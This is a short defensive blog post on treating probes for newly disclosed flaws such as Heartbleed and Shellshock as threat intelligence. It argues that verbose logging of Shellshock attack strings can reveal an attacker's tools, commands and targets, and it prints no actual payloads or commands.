This year has been very interesting in terms of massive, critical vulnerabilities in some of the fundamental technologies and protocols that underpin the Internet, (Heartbleed and Poodle) and in some of the foundational software packages that comprise our computing platforms (Bash - shellshock).
As a practitioner who has had to scramble around to patch these systems, some interesting artifacts have arisen which got me to thinking about threat intelligence. In addition to patching machines, we were aware that some of these vulnerabilities had been around for some time before public disclosure. Even after public disclosure, there was some period of time before patches were available for all the affected platforms that an enterprise would possibly have in their environment.
Which leads me to this: these types of vulnerabilities can potentially serve as a way to identify your adversaries. Think of it - if you have an adversary who wants to get into your network and a vulnerability like heartbleed or shellshock becomes known, don't you think they want to probe you immediately to see if they can use the period in between vulnerability and patch to compromise your systems?
From a vulnerability management perspective, this is why compensating controls are so important. You must protect yourself while you are waiting for that patch.
However, I would make the point that it is extremely important to also log any attempts to take advantage of the vulnerability in as verbose a fashion as possible. If you have the choice of two different compensating controls and one gives you a better view/more intelligence about the attacking party - choose that one (actually, choose both!)
Different types of attacks can provide more detailed intelligence on your attackers
Heartbleed didn't really give us much in the way of telemetry about our attackers, mostly because in the early period after the disclosure, there wasn't a good way of detecting probes. Later, there were some signatures for IDS. At best, you'd get some idea of the IP addresses that were probing you. And as we all know, IP does not provide strong attribution. Using it to identify your adversaries is not a winning strategy.
Shellshock gave us a lot more to go on. Attackers had to craft "attack strings" to take advantage of the vulnerability and these strings appeared in web logs. Reviewing logs could give us some idea of the attackers approach:
Tool repositories
preferred commands
desired targets - both hosts and the files on them.
Now, these are the kinds of Tactics, Techniques, and Procedures that provide better identification of your attackers.
No comments:
Post a Comment